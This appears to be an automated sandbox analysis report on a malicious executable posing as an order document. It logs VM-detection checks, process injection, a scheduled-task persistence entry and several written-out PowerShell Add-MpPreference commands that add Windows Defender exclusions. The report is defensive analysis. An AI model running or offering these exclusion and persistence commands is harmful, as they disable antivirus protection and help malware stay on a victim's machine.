Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4631Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2269Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4255Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2680Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5378
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3163
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeWindow / User API: threadDelayed 5367
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeWindow / User API: threadDelayed 4007
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeWindow / User API: foregroundWindowGot 639
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe TID: 3396Thread sleep time: -41772s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe TID: 6136Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep count: 4255 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100Thread sleep count: 2680 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5144Thread sleep time: -26747778906878833s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6232Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe TID: 6292Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeThread delayed: delay time: 41772Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000008.00000003.389081037.00000000059A8000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.394834074.00000000050CC000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: #RFQ ORDER7678432213211.exeBinary or memory string: zE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ]tM5W|Y5fY<YeDL[]nopgyMKX3QZ]tM5WzE[Ti4JD|YJ]s]6e|EIgmYpdl<nfoU[gz45eG<YeDPZeV]WerYHWsYZfGgmTWg4U3EzTqEqVWooe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483084169.000000000122D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)Zs
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000008.00000003.389081037.00000000059A8000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.394834074.00000000050CC000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Adds a directory exclusion to Windows DefenderShow sources
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'Jump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeMemory written: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'Jump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeProcess created: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeJump to behavior
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.489922128.00000000033F8000.00000004.00000001.sdmpBinary or memory string: Program Manager
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483819077.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483819077.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Progman
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483819077.0000000001A10000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
